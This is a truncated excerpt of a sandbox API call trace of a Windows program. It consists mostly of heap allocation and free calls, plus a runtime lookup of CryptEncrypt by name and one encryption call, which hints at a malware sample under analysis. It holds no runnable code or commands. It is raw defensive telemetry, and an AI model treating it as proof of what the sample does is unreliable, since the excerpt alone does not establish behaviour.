[0163.659] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.659] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.660] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.660] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.660] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.660] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.660] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0163.660] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.661] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0163.661] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.661] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0163.661] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0163.661] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.662] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.662] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2dd8 | out: hHeap=0x25c0000) returned 1 [0163.662] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0163.662] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0163.662] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.662] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.662] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.663] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.663] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0163.663] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa670 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa370 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.663] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c78 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa580 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa760 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0163.664] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2b0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24165e8 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.665] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0163.666] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.666] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.667] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0163.667] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa658, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.668] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5e0 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1c) returned 0x24b3c18 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0130 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00c0 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0140 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0150 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0160 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0163.668] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c18 | out: hHeap=0x25c0000) returned 1 [0163.668] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x11a, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x120) returned 1 [0163.668] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x24165e8 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c18 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5e0 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa658 | out: hHeap=0x25c0000) returned 1 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa658 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.669] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0163.669] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa508 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0163.670] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa310 | out: hHeap=0x25c0000) returned 1 [0163.670] RtlAllocateHeap (HeapHandle=0x25c0000, 